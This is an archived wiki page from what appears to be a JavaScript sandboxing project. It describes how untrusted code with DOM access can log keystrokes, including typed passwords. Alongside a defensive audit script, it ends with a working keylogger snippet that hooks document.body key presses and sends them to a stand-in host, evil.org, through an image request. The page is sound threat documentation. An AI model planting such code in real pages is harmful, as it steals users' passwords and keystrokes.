This repository has been archived by the owner on Feb 2, 2021. It is now read-only.

DomAllowsKeylogging

Kevin Reid edited this page Apr 16, 2015 · 1 revision

(legacy labels: Attack-Vector)

DOM access allows keylogging

Effect

If the implementation can phone home, it can log keystrokes and send them home. If the embedding page contains a password field, it could log the password as typed even if it can't access the password's value.

Background

Any DOM element is reachable from any other, and the onkeypress handler on document.body will receive all keystrokes in the current frame. It does not receive keystrokes cross frame -- not even from iframes.

Assumptions

Untrusted code can access a DOM element that is a parent of a password field, and can add an onkeypress or onkeydown or onkeyup event handler.

Untrusted code can cause the browser to request a URL that it controls, or store the data for retrieval by other means.
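
The first assumption can be checked mechanically before a node is handed to untrusted code. The following audit is an added example, not part of the original wiki page or of the project's code: it lists every password field in the same frame as the granted node and the ancestors that carry key handlers. The element ids and the sample tree are constructed for illustration.

```javascript
// Audit which password fields share a frame with a node given to untrusted code.
// Reads only parentNode/children/tagName/type/on*, so it takes real DOM nodes
// or the constructed tree below.
const KEY_PROPS = ['onkeypress', 'onkeydown', 'onkeyup'];

function frameRoot(node) {
  // Any element is reachable from any other: climb to the top of this frame.
  while (node.parentNode) node = node.parentNode;
  return node;
}

function passwordFields(node, found = []) {
  const tag = (node.tagName || '').toUpperCase();
  if (tag === 'INPUT' && node.type === 'password') found.push(node);
  // An iframe's document is not among its children, so other frames are skipped.
  for (const child of Array.from(node.children || [])) passwordFields(child, found);
  return found;
}

function keyHandlerAncestors(field) {
  // Key events bubble from the field through every ancestor in the same frame.
  const hits = [];
  for (let n = field.parentNode; n; n = n.parentNode) {
    if (KEY_PROPS.some((p) => typeof n[p] === 'function')) hits.push(n.id || n.tagName || '#document');
  }
  return hits;
}

function auditGrantedNode(granted) {
  return passwordFields(frameRoot(granted)).map((f) => ({
    field: f.id,
    observedBy: keyHandlerAncestors(f),
  }));
}

// Constructed sample tree (hypothetical ids), not taken from any real page.
function el(tagName, props = {}, children = []) {
  const node = { tagName, parentNode: null, children, ...props };
  children.forEach((c) => { c.parentNode = node; });
  return node;
}
const widget = el('DIV', { id: 'untrusted-widget' });
const login = el('INPUT', { id: 'login-pw', type: 'password' });
const body = el('BODY', { id: 'body', onkeypress() {} }, [widget, el('FORM', { id: 'f' }, [login])]);
// Separate frame: its own root, unreachable by parentNode from `body`.
const framedPw = el('INPUT', { id: 'framed-pw', type: 'password' });
const frameBody = el('BODY', { id: 'frame-body' }, [framedPw]);
console.log(JSON.stringify(auditGrantedNode(widget)));
```

Only handlers assigned as on* properties are visible to this check; listeners registered with addEventListener cannot be enumerated from script, so an empty observedBy list does not prove that nothing is listening.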

Versions

All

Example

Date.now = Date.now || function () { return (new Date).getTime(); };
var log = [];
var lastSend = Date.now();
document.body.onkeypress = function (event) {
  log.push(event.which || event.keyCode);
  if (Date.now() - lastSend > 1000) {
    (new Image()).src = 'http://evil.org?keys_logged=' + log.join();
    log = [];
    lastSend = Date.now();
  }
};